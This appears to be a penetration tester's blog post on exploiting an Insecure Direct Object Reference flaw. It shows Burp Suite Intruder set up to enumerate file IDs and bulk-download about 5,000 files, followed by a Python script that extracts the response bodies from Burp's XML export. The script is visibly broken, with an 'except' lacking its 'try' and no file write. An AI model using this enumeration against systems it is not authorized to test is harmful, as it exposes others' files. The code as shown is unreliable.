I recently found an Insecure Direct Object Reference (IDOR) vulnerability in a web application that I was testing. By incrementing or decrementing an ID value, I could download any file in the application, even though they were not listed for download in the user interface.

A simple way to exploit this kind of attack is by using Burp Suite Intruder.  To do this, first send a request to Intruder by right-clicking on a request and click “Send to Intruder.” Within intruder, use the attack type of “Sniper” and put the § symbols around the ID number. For payloads, choose the payload type of “Numbers.”  Enter a starting number and an ending number, and set step to “1” or “-1” depending on whether you want to increment or decrement from your start position.  Run the attack.  This is a simple set-up for a basic IDOR, however sometimes it is a bit more complicated (ex. CSRF tokens).

For the app I was testing, the request would return a file for download.  It would set the HTTP header “content-disposition: attachment;” in the response. This would help me separate valid IDs from invalid IDs, as invalid requests would not return that header.  This can be used to sort the output by going to the “Options” tab, and using “Grep – Match” and adding “attachment” as a value.  The results would then have a column which I could use to sort on.

After enumerating around ~5,000 files, I wanted to download them.  I looked for a solution native to Burp Suite, but did not find any.  Right clicking on a response and selecting “Copy to file” would allow me to save the response, however I could only do one at a time and the file would also include all of the HTTP headers, whereas I only wanted the response body.  Burp Suite also had the option of “Save Item” which would save an XML file designed to be ingested by Burp.   This XML file contained all the information you see in the UI, including the request, response, and associated metadata.  When items are selected in bulk, you can right click and choose “Save Selected Items“, which will include all of the request and responses into a single XML file.

In my case, I ended up with a 1.5GB XML file.  The next task was to extract the files that were contained within.  I ended up writing a Python script to do it, seen below:

import bs4
import base64
from bs4 import BeautifulSoup
# Import the Burp File
path = 'FILEPATH'
burp_file = open(path,'r')
xml = burp_file.read()
# Parse the XML with BeautifulSoup
parsed = BeautifulSoup(xml, "html.parser")

# Search through each item in the file
for document in parsed.find_all('item'):
        # Extract the CDATA content within an item response
        # https://stackoverflow.com/questions/2032172/how-can-i-grab-cdata-out-of-beautifulsoup
        based = document.response.find(text=lambda tag: isinstance(tag, bs4.CData)).string.strip()
        # Decode the base64 encoded response
        data = base64.b64decode(based)
        # Strip off the HTTP headers, leaving only the body
        content = data.split(b'\r\n\r\n')[1]
        # Extract the filename from the HTTP header, replace any slashes in filename
        stringed = str(data)
        filename = (stringed.split("filename=\"")[1].split("\"")[0]).replace("/", "-")
        # Write the body to a file using extracted filename
        f = open("/tmp/" + filename, "wb")
    # If something goes wrong, print the exception
    except Exception as e:

This script would go through each item, and extract each response.  Using the filename present in the content-disposition header, it would strip out the body of the request and put it into a new file on disk using the original filename.  The script can also be located on Github here.

This could also be done other ways, however Burp Suite is still probably the best way, as session macros can be used to deal with CSRF tokens quite easily.